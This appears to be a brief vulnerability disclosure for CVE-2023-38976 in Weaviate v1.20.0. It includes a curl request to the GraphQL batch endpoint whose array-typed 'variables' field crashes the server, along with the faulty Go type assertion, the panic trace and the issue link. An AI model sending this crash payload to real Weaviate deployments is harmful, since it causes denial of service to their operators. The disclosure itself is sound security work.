1. CVE-2023-38976

Version: v.1.20.0

run AUTHENTICATION_ANONYMOUS_ACCESS_ENABLED=true PERSISTENCE_DATA_PATH=/r3p/vdb/wea/ ./weaviate-server --port=8080 --scheme=http

send curl -X POST -H 'Content-Type: application/json' -d '[{"operationName":"r3","query":"r3","variables":[1337]}]' <http://127.0.0.1:8080/v1/graphql/batch>

if Variables is not map[string]interface{}, it may panic

//handlers_graphql.go:222 
    if unbatchedRequest.Variables != nil {
      variables = unbatchedRequest.Variables.(map[string]interface{})
    }

panic: interface conversion: interface {} is []interface {}, not map[string]interface {}

goroutine 2111 [running]:
github.com/weaviate/weaviate/adapters/handlers/rest.handleUnbatchedGraphQLRequest({0x1c0b108, 0xc005a6ba10}, 0x14800000735?, {0x1bfb8a0, 0xc000564000}, 0xc005a6b8c0, 0x0, 0xc0004c48b8, 0xc0028bcd98)
        /r3p/vdb/wea/wea1200/adapters/handlers/rest/handlers_graphql.go:222 +0x6ee
created by github.com/weaviate/weaviate/adapters/handlers/rest.setupGraphQLHandlers.func2
        /r3p/vdb/wea/wea1200/adapters/handlers/rest/handlers_graphql.go:179 +0x36d

https://github.com/weaviate/weaviate/issues/3258

Powered by Fruition